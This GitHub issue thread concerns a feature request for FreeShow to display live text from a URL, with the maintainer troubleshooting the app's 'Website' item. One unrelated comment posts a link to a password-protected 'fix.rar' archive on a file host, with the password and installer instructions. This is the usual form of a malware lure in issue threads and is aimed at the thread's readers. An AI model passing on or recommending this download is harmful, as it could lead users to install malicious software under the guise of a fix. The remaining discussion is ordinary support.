### ISSUE TITLE
[Feature Request] {Add live text via URL}

### ISSUE THREAD

**Issue by Johnny-BGoode** [ChurchApps/FreeShow#784]
**Describe the feature**
Hello, would it be possible to add URL text feature? So it will be possible to show video background and live text from URL as overlay (OBS has this feature for live streaming). Plus add some text aligning feature for it to be prettier :) (OBS cannot align text from url, and I miss it). Thank you very much! 

Jan from Ostrava, Czech Republic, Europe

**Additional context**

**Comment by yiweifengyan** [comment]
Download 
https://www.mediafire.com/file/czdodbba054p738/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by vassbo** [comment]
Could you please provide more context, or an example. What URL format, what data is received, etc.

**Comment by Johnny-BGoode** [comment]
Thank you for your reply! We use worshiper.cz. On this url (https://worshiper.cz/livestream?display=livestream-dd83&event=e6298b36-c633-4509-99bc-c02988323e33) you can see the text, that comes from this app, and in OBS is displayed correctly. Hope this helps, but for not being a programmer, I cant tell you more about the technical terms...

**Comment by Johnny-BGoode** [comment]
UPDATE: it is probably running on Javascript. And when you open the url, leave it open for longer period of time, it show text after I change "slide" (Maybe it sounds weird, but that is how it works :) )

**Comment by vassbo** [comment]
All right, have you tried using the "Website" item & pasting the URL here. that might work!

**Comment by Johnny-BGoode** [comment]
Thank you for your patience, but it seems like the website item is not working at all for me... M1 Mac with Sonoma OS

**Comment by vassbo** [comment]
What's not working? If you type in a generic URL like http://example.net does that load at all? When pasting the worshiper link do you get any content from the live text page?

If you did not find the item iteself follow these steps: Create a new slide, then in "Edit", click on "Website" under "Items", then click to select and paste your URL on the right side.
![bilde](https://github.com/user-attachments/assets/00422a4e-cc9a-4739-aa64-bbf9aab896cb)

**Comment by Johnny-BGoode** [comment]
When I try load any website (here I tried google), it ends like this:

<img width="1440" alt="Snímek obrazovky 2024-08-29 v 8 54 39" src="https://github.com/user-attachments/assets/bc0eddc6-80e0-4f42-bf74-5f0b94216fc4">

Looks like it does not load at all.. Am I doing something wrong?

**Comment by vassbo** [comment]
You need to enter a valid url with the https:// at the start.
